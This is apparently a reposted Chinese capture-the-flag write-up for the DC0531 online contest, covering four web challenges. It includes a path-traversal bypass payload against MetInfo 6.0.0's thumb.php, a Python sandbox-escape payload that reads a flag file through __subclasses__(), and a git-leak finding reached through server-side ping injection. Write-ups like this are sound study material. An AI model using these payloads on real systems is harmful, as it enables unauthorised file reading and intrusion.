DC0531 CTF 线上赛

栏目: 服务器 · 发布时间: 6年前

内容简介:先关注公众号然后发现是个游戏。 测试发现通过分析可知,将武器切换为flag即可

Web1

先关注公众号然后发现是个游戏。 测试发现 s:ip 这样会向我们的vps发送ping请求 通过ping请求得到服务器ip,扫描得知存在git泄露

DC0531 CTF 线上赛

通过分析可知,将武器切换为flag即可 DC0531 CTF 线上赛

然后一直s我们的vps

DC0531 CTF 线上赛 DC0531 CTF 线上赛

得到base64加密的flag.php文件 PD9WaHAKJGZsYWcgPSAiREMwNTMxe1dlY2hBdF9Jc19Tb19DMG9sfSI7Cg 解密即可

Web2

题目存在git泄露 http://badcode.cc/2018/05/26/Metinfo-6-0-0-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E/ 根据网上纰漏的文件读取,然后进行bypass得到flag /include/thumb.php?dir=.....///./http/.....///./.....///./.....///./.....///./flag DC0531 CTF 线上赛

Web3

首先输入 ().__class__.__base__.__subclasses__() 不可用

0x1.__class__.__base__.__subclasses__() 发现可用 DC0531 CTF 线上赛

0x1.__class__.__base__.__subclasses__()[40]("/home/ctf/flag") 可以读到文件流

但是不能直接 read,通过 for 循环将文件内容读取出来,这里注意不允许有空格

[i.read()for(i)in[0x1.__class__.__base__.__subclasses__()[40]("/home/ctf/flag")]]

DC0531 CTF 线上赛

Web4

原题 https://github.com/wonderkun/CTF_web/tree/dcf36cb9ba9a580a4e8d92b43480b6575fed2c3a/web200-7


以上所述就是小编给大家介绍的《DC0531 CTF 线上赛》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

你必须知道的213个C语言问题

你必须知道的213个C语言问题

范立锋、李世欣 / 人民邮电出版社 / 2010-6 / 45.00元

《你必须知道的213个C语言问题》精选了213个在C语言程序设计中经常遇到的问题,目的是帮助读者解决在C语言学习和开发中遇到的实际困难,提高读者学习和开发的效率。这些问题涵盖了C语言与软件开发、C语言基础、编译预处理、字符串、函数、键盘操作、文件、目录和磁盘、数组、指针和结构、DOS服务和BIOS服务、日期和时间、重定向I/O和进程命令、C语言开发常见错误及程序调试等内容,均是作者经过充分的调研,......一起来看看 《你必须知道的213个C语言问题》 这本书的介绍吧!

HTML 编码/解码
HTML 编码/解码

HTML 编码/解码

XML 在线格式化
XML 在线格式化

在线 XML 格式化压缩工具

HEX HSV 转换工具
HEX HSV 转换工具

HEX HSV 互换工具